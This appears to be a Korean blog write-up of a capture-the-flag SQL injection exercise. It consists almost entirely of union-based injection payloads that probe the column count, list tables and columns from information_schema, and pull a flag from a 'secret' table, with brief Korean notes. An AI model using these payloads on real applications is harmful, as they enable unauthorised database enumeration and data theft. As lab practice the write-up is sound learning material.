' order by 6 #
' union select 1,2,3,4,5,6 #
' union select 1,2,3,4,5,database() from information_schema.tables #
' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema = 'sqli_5' #
table_schma = database() 임
' union select 1,2,3,4,5,column_name from information_schema.columns where table_name = 'flag_honey' #
2차
' union select 1,2,3,4,5,table_name from information_schema.tables #
' union select 1,2,3,4,5,column_name from information_schema.columns where table_name = 'CHARACTER_SETS'#
' union select 1,2,3,4,5,CHARACTER_SET_NAME from CHARACTER_SETS #
이 안에는 아무것도 없음
' union select 1,2,3,4,5,table_name from information_schema.tables where table_schema = 'sqli_5' limit 2,1#
sqli_5 데이터베이스 안에 있는 3번째 행의 테이블 이름이 secret
' union select 1,2,3,4,5,column_name from information_schema.columns where table_name = 'secret' #
' union select 1,2,3,4,5,flag from secret #
' union select 1,2,3,4,5,flag from secret limit 1,1 #
'Information Technology > write-up' 카테고리의 다른 글
| SQL Injection (Blind Practice) (0) | 2025.05.28 |
|---|---|
| SQL Injection (Error Based SQLi Basic) - extractvalue (0) | 2025.05.28 |
| SQL Injection 1 - order by, like, union (0) | 2025.05.28 |
| Can you crack me? - base64, alternative (0) | 2025.05.28 |
| Login Bypass5 - Cookies (0) | 2025.05.28 |